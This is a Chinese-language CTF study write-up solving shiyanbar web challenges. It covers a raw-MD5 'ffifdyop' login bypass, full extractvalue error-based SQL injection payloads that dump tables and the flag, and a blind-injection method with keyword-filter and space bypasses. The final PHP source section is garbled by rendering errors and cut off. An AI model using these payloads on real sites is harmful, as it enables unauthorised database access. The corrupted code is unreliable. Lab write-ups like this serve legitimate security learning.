关于CTF学习总结

后台登录：
CTF地址http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
基本思路：1，查看源码，看到注释有 介绍，关于MD5加密。

这里面的md5()函数有两个参数，一个是要加密的字符串，另一个是输出格式，具体是
raw
可选。规定十六进制或二进制输出格式：

TRUE - 原始 16 字符二进制格式
FALSE - 默认。32 字符十六进制数

但是组成查询语句的时候这个hex会被转成字符串，如果转换之后的字符串包含’or’，就会和原查询语句一起组成

$sql=“select password from users where password=’‘or’’”
导致了sql注入。

提供一个字符串：ffifdyop

md5后，276f722736c95d99e921722cf9ed621c

再转成字符串： 'or’6<其他字符>
---------------------加了料的报错注入
CTF题地址：http://ctf5.shiyanbar.com/web/baocuo/index.php
基本思路：第一步：看源代码—>第二步：提交单引号，看有没有报错，确定是否有注入。
看源码，发现一点提示

试了之后在username和password提交单引号都报错，说明都注入了，接下来就是构造sql注入语句了。

第一条 username=1’ or extractvalue/&password=1/(1,concat(0x7e,(select database()),0x7e))or’

这里需要用的知识

1.http分割注入（用注释符/**/把中间的语句注释掉）

2.extractvalue函数（解析XML，返回查询的语句和concat连接起来，会提示报错。所以会把信息报出来）

3.concat函数（concat（a，b，c）把字符串abc连起来，因为报错出来的字符有限，要用特殊字每连接， 这样会完整的报出来。所以会用到0x7e,就是~符号）

得出数据库名

XPATH syntax error: ‘_{error_based_hpf}’
第二条username=1’ or extractvalue/&password=1/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema regexp database()),0x7e))or’

这个和上面的差不多一样，改变了一下查询语句（ps：这道题过滤了等号，所以可以用 in()，regexp()’'等方法绕过）

用到了group_concat()函数，因为查询结果有多行(多个表)，这个函数的作用是将多行聚合为一行返回结果。

得表名 XPATH syntax error: ‘_{ffll44jj,users}’ 两个表，一看就是前一个

第三条username=1’ or extractvalue/&password=1/(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name regexp ‘ffll44jj’),0x7e))or’

得到字段名XPATH syntax error: ‘_value’

第四条 username=1’ or extractvalue/&password=1/(1,concat(0x5c,(select group_concat(value) from ffll44jj)))or’

XPATH syntax error: ‘\flag{err0r_b4sed_sqli_+_hpf}’
---------------------题三：认真一点-----
CTF地址：http://ctf5.shiyanbar.com/web/earnest/index.php
刚打开是一个输入框，第一反应是sql注入，经过各种实验我们的出结论

1.提交1或用语句让框内为真，显示You are in。

2.提交语句有错误或语句让框内为假，不报错，但显示You are not in（实质和报错一样）

3.提交某些特殊字符会被过滤并显示sql injection detected,经过各种测试（可用Burp suite进行模糊测试或脚本提交敏感字符）发现过滤的字符有and,空格，+，#，union，逗号，

4.提交语句id=1’or’1’='2，如果网页对or没有任何处理的话，应返回You are in（因为后面的语句错误，相当于只提交id=1），但返回的却是You are not in，说明or被处理了。一般的后台处理逻辑是匹配or、or（不分大小写）、or+空格并替换为空。尝试改变大小写和用oorr代替，发现回显都为You are in，也就是说，后台处理应该是匹配or（小写），并将其替换为空，并且仅仅处理了一次。所以在接下来的语句构造中我们可以用oorr，OR等代替or。

那么接下来我们使用python脚本进行盲注

跑数据库名长度->跑数据库名->跑表名长度->跑表名->跑字段名长度->跑字段名
链接中脚本思想：通过构造 2’oorr(这里放语句)oorr’2 ，当括号中括号为真时，页面返回You are in ; 否则返回其他。

通过requests.post(url,data) 一个个将猜数字，猜库名表名字母的语句post上去，当"You are in" 出现在 requests.post(url,data).txt 时，说明返回成功，返回当前语句中猜测的字母，数字。

1.由于提取字符函数substr（）被过滤了，用mid（）函数达到同样效果

2.由于逗号被过滤了，在mid（）函数中用from(%d)for(1)代替逗号分隔符，如mid((database())from(1)foorr(1))代表库名第一个字母（for中的or也被过滤了，所以用foorr）。

3.由于空格被过滤了，我们用

flag = flag.replace(’ ', chr(0x0a))
将构造语句中的空格用chr(0x0a),也就是换行符\n替代（这也行？），其实在原代码语句中，后面用括号代替空格的情况也可以改回用空格了。

4.提醒requests.post(url,data)中的data一定要是字典{id:“ ”}。

5.猜长度的语句和猜字母的一样，只不过放在后面的字母为’’，同时做一个计数器，当匹配到空时，说明名字匹配结束，返回计数器当前的数字就是名字长度。

(group_concat(table_name separatoorr ‘@’)
(group_concat(column_name separatoorr ‘@’)
用以上语句代替table_name和column_name，是因为可能有多个表段和多个字段，这个语句让多个表名，字段名一起输出并用@将之分隔。具体解释参考 这个
7.最后有个小坑就是用脚本跑出来的数据长度13位不是实际的穿的长度，因为数据中含有的-是空格转义来的，脚本识别到就以为数据结束了（这里不是很明白，空格和空不是不一样么？为什么遇到空格就停了）。由上面可知，最后爆出的flag是flag{haha_{you-win!}中的-是空格，所以真正的flag是flag{haha}you win!}。

首先刚进网页就是一个have fun! 看了源码没有什么提示，也没有输入框，那就打开F12看看

响应头中有一个hint，打开hint的地址，获取源码。

foreach([$_POST] as KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ foreach(global_var as $key => $value) {
$value=trim($value);
is_string($value) && $req[$key] = addslashes(KaTeX parse error: Expected 'EOF', got '}' at position 14: value); }̲ } 源码中把number变成数组$req[“number”]，从做题过程来看这俩货应该都输代表输入的number值，但变成数组后过滤了原来值中的空格并且在单引号和双引号前加了反斜杠 详见 trim()函数的用法 和addslashes()函数的用法
以下展示关键源码,获取flag有四个条件

if(is_numeric($_REQUEST[‘number’])){

$info=“sorry, you cann’t input a number!”;//条件1：输入的不能只是数字

}elseif( r e q [ ′ n u m b e r ′ ] ! = s t r v a l ( i n t v a l ( req[&#x27;number&#x27;]!=strval(intval(